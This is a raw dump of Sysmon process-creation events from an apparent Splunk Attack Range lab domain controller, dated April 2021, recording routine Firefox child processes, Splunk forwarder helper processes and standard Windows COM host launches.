C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\gtdf58bl.default-release\saved-telemetry-pings\4031e1f7-1a1b-48f7-88fe-9dc3acd7fc18C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=2CA82B57DB86DB7E0E729E8A265BC7AA,SHA256=95770A446509CE22CA41D30DD0EFB3413CD61247358100D72B9BF3F71E1083B2,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000017005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:35.440{A8622C2F-428F-6078-F704-00000000AE01}5168C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.35.63447139\1168973224" -childID 6 -isForBrowser -prefsHandle 4552 -prefMapHandle 2364 -prefsLen 11510 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 4764 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016998Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:35.425{A8622C2F-428F-6078-F604-00000000AE01}6072C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.34.1338807210\1876676629" -childID 5 -isForBrowser -prefsHandle 4376 -prefMapHandle 4656 -prefsLen 11510 -prefMapSize 229564 -parentBuildID 20210318103112 
-appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 4684 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:34.390{A8622C2F-428E-6078-F504-00000000AE01}6204C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.27.1350559162\1120258735" -childID 4 -isForBrowser -prefsHandle 3580 -prefMapHandle 3520 -prefsLen 2896 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 3592 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016682Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:34.079{A8622C2F-428E-6078-F404-00000000AE01}5256C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.20.1884969510\718157581" -childID 3 -isForBrowser -prefsHandle 2936 -prefMapHandle 2932 -prefsLen 1505 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla 
Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 2944 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:33.965{A8622C2F-428D-6078-F304-00000000AE01}6964C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.13.911743561\1209229604" -childID 2 -isForBrowser -prefsHandle 2736 -prefMapHandle 2732 -prefsLen 1465 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 2744 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016548Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:33.831{A8622C2F-428D-6078-F204-00000000AE01}3472C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.6.582201235\234433771" -childID 1 -isForBrowser -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 1360 -prefMapSize 229564 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 
"\\.\pipe\gecko-crash-server-pipe.6992" 2440 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:33.280{A8622C2F-428D-6078-F104-00000000AE01}6356C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6992.0.1983816045\1753010594" -parentBuildID 20210318103112 -prefsHandle 2000 -prefMapHandle 2012 -prefsLen 1 -prefMapSize 229564 -appdir "C:\Program Files\Mozilla Firefox\browser" - 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 1580 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016451Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:30.597{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-428A-6078-EE04-00000000AE01}7084C:\Program 
Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000016440Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:30.527{A8622C2F-428A-6078-EE04-00000000AE01}7084C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000016426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:26.284{A8622C2F-4286-6078-ED04-00000000AE01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016416Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:24.831{A8622C2F-4284-6078-EC04-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016406Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:24.159{A8622C2F-4284-6078-EB04-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016397Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:23.487{A8622C2F-4283-6078-EA04-00000000AE01}1444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:22.676{A8622C2F-4282-6078-E904-00000000AE01}4896C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016375Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:21.925{A8622C2F-4281-6078-E804-00000000AE01}616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016365Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:21.112{A8622C2F-4281-6078-E704-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:47.095{A8622C2F-425F-6078-E604-00000000AE01}1772C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000016186Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:26.285{A8622C2F-424A-6078-E404-00000000AE01}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000016176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:24.879{A8622C2F-4248-6078-E304-00000000AE01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016166Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:24.207{A8622C2F-4248-6078-E204-00000000AE01}4528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016157Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:23.535{A8622C2F-4247-6078-E104-00000000AE01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016148Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:22.457{A8622C2F-4246-6078-E004-00000000AE01}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000016135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:21.785{A8622C2F-4245-6078-DF04-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000016125Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:40:21.113{A8622C2F-4245-6078-DE04-00000000AE01}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:35.193{A8622C2F-4217-6078-9C04-00000000AE01}6720C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000015662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:26.271{A8622C2F-420E-6078-8904-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:25.005{A8622C2F-420D-6078-8604-00000000AE01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:24.333{A8622C2F-420C-6078-8104-00000000AE01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015584Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:39:23.520{A8622C2F-420B-6078-7D04-00000000AE01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:22.600{A8622C2F-420A-6078-7904-00000000AE01}3216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:21.911{A8622C2F-4209-6078-7704-00000000AE01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
